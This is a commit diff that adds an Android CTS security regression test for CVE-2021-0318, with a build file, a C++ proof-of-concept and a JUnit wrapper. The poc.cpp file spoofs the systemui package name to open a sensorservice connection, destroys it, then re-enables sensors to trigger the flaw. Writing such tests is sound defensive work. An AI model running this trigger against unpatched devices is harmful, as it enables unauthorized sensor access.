Adds CTS test for CVE-2021-0318

Bug: 173531328
Test: Run test and verify pass on fixed build, and fails on non-fixed
build

Change-Id: Icbd88b6ed62bd8e3e15a8bf42accd411499ddb77
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0318/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0318/Android.bp
new file mode 100644
index 0000000..2b63d91
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0318/Android.bp
@@ -0,0 +1,30 @@
+// Copyright (C) 2020 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//      http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+cc_test {
+    name: "CVE-2021-0318",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: ["poc.cpp"],
+    shared_libs: [
+       "libsensor",
+       "libsensorservice",
+       "libbinder",
+       "libutils",
+    ],
+    cflags: [
+        "-Wall",
+        "-Werror",
+        "-Wextra",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0318/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0318/poc.cpp
new file mode 100644
index 0000000..cd67392
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0318/poc.cpp
@@ -0,0 +1,122 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <binder/IPCThreadState.h>
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+#include <binder/ProcessState.h>
+#include <sensor/Sensor.h>
+#include <stdio.h>
+
+#include "../includes/common.h"
+
+using namespace android;
+
+void poc(int handle) {
+    status_t err;
+    sp<IServiceManager> sm = defaultServiceManager();
+    String16 name(String16("sensorservice"));
+    sp<IBinder> service = sm->getService(name);
+
+    if (service) {
+        Parcel data, reply;
+        data.writeInterfaceToken(service->getInterfaceDescriptor());
+        data.writeString8(String8("com.android.systemui.doze.DozeScreenBrightness"));
+        data.writeInt32(0 /*mode*/);
+        data.writeString16(String16("com.android.systemui"));
+        err = service->transact(2 /*CREATE_SENSOR_EVENT_CONNECTION*/, data, &reply, 0);
+        printf("CREATE_SENSOR_EVENT_CONNECTION err %08x \n", err);
+
+        sp<IBinder> binder = reply.readStrongBinder();
+
+        if (binder) {
+            {
+                Parcel data, reply;
+                data.writeInterfaceToken(binder->getInterfaceDescriptor());
+                data.writeInt32(handle); // handle
+                data.writeInt32(1);      // enabled
+                data.writeInt64(0);      // samplingPeriodNs
+                data.writeInt64(989680); // maxBatchReportLatencyNs
+                data.writeInt32(0);      // reservedFlags
+                err = binder->transact(2 /*ENABLE_DISABLE*/, data, &reply, 0);
+                printf("ENABLE_DISABLE transact err %08x \n", err);
+            }
+
+            sleep(1);
+
+            {
+                Parcel data, reply;
+                String16 name = binder->getInterfaceDescriptor();
+                data.writeInterfaceToken(name);
+                err = binder->transact(6 /*DESTROY*/, data, &reply, 0);
+                printf("DESTROY transact err %08x \n", err);
+            }
+
+            {
+                Parcel data, reply;
+                data.writeInterfaceToken(binder->getInterfaceDescriptor());
+                data.writeInt32(handle); // handle
+                data.writeInt32(1);      // enabled
+                data.writeInt64(0);      // samplingPeriodNs
+                data.writeInt64(989680); // maxBatchReportLatencyNs
+                data.writeInt32(0);      // reservedFlags
+                err = binder->transact(2 /*ENABLE_DISABLE*/, data, &reply, 0);
+                if (reply.readInt32() == OK) {
+                    // Success in enabling a sensor after destroy leads to
+                    // security vulnerability.
+                    exit(EXIT_VULNERABLE);
+                }
+                printf("ENABLE_DISABLE transact err %08x\n", err);
+            }
+        } else {
+            printf("binder is null!\n");
+            sleep(3);
+        }
+    }
+}
+
+void get_sensor_list() {
+    sp<IServiceManager> sm = defaultServiceManager();
+    String16 name(String16("sensorservice"));
+    sp<IBinder> service = sm->getService(name);
+    if (service) {
+        Parcel data, reply;
+        data.writeInterfaceToken(String16("android.gui.SensorServer"));
+        data.writeString16(String16("opPackageName"));
+        service->transact(1 /*GET_SENSOR_LIST*/, data, &reply);
+
+        Sensor s;
+        Vector<Sensor> v;
+        uint32_t n = reply.readUint32();
+        v.setCapacity(n);
+        while (n > 0) {
+            n--;
+            reply.read(s);
+            v.add(s);
+            String8 nm = s.getName();
+            std::string nstr = nm.string();
+            String8 vd = s.getVendor();
+            std::string vstr = vd.string();
+            int32_t handle = s.getHandle();
+            printf("%s : %s, handle %d\n", nstr.c_str(), vstr.c_str(), handle);
+            poc(handle);
+        }
+    }
+}
+
+int main(int /* argc */, char** /* argv */) {
+    get_sensor_list();
+    return 0;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc21_01.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc21_01.java
new file mode 100644
index 0000000..711949a
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc21_01.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import static org.junit.Assert.*;
+import static org.junit.Assume.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class Poc21_01 extends SecurityTestCase {
+
+    /**
+     * b/168211968
+     */
+    @Test
+    @SecurityTest(minPatchLevel = "2021-01")
+    public void testPocCVE_2021_0318() throws Exception {
+        AdbUtils.runPocAssertExitStatusNotVulnerable("CVE-2021-0318", getDevice(), 300);
+    }
+}